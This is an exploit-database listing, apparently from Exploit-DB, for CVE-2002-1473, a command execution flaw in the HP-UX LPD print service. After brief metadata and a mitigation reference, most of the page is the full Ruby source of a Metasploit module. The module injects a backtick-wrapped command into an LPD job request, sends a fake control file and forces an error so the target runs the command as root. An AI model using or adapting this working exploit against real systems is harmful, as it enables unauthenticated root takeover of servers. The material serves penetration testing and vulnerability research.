HP-UX LPD Command Execution

vendor:

HP-UX

by:

hdm

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: HP-UX

Affected Version From: HP-UX

Affected Version To: HP-UX

Patch Exists: YES

Related CWE: CVE-2002-1473

CPE: o:hp:hp-ux

Metasploit: https://www.rapid7.com/db/vulnerabilities/hpux-cve-2003-1461/

Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/hpux/lpd/cleanup_exec

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix, HP-UX

2002

HP-UX LPD Command Execution

This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.

Mitigation:

HP Security Bulletin HPSBUX0208-213

Source

Exploit-DB raw data:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP-UX LPD Command Execution',
			'Description'    => %q{
				This exploit abuses an unpublished vulnerability in the
				HP-UX LPD service. This flaw allows an unauthenticated
				attacker to execute arbitrary commands with the privileges
				of the root user. The LPD service is only exploitable when
				the address of the attacking system can be resolved by the
				target. This vulnerability was silently patched with the
				buffer overflow flaws addressed in HP Security Bulletin
				HPSBUX0208-213.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-1473'],
					[ 'OSVDB', '9638'],
					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

				],
			'Platform'       => ['unix', 'hpux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 200,
					'DisableNops' => true,
					'BadChars'    => "\x00\x09\x20\x2f",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},			
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# The job ID is squashed down to three decimal digits
		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# Connect to the LPD service
		connect
		
		print_status("Sending our job request with embedded command string...")
		# Send the job request with the encoded command
		sock.put(
			"\x02" + rand_text_alphanumeric(3) + jid +
			"`" + payload.encoded + "`\n"
		)
		
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our job request")
			return
		end

		print_status("Sending our fake control file...")		
		sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our control file")
			return
		end
		
		print_status("Forcing an error and hijacking the cleanup routine...")
		
		begin
			sock.put(rand_text_alphanumeric(16384))
			disconnect
		rescue
		end
		
	end

end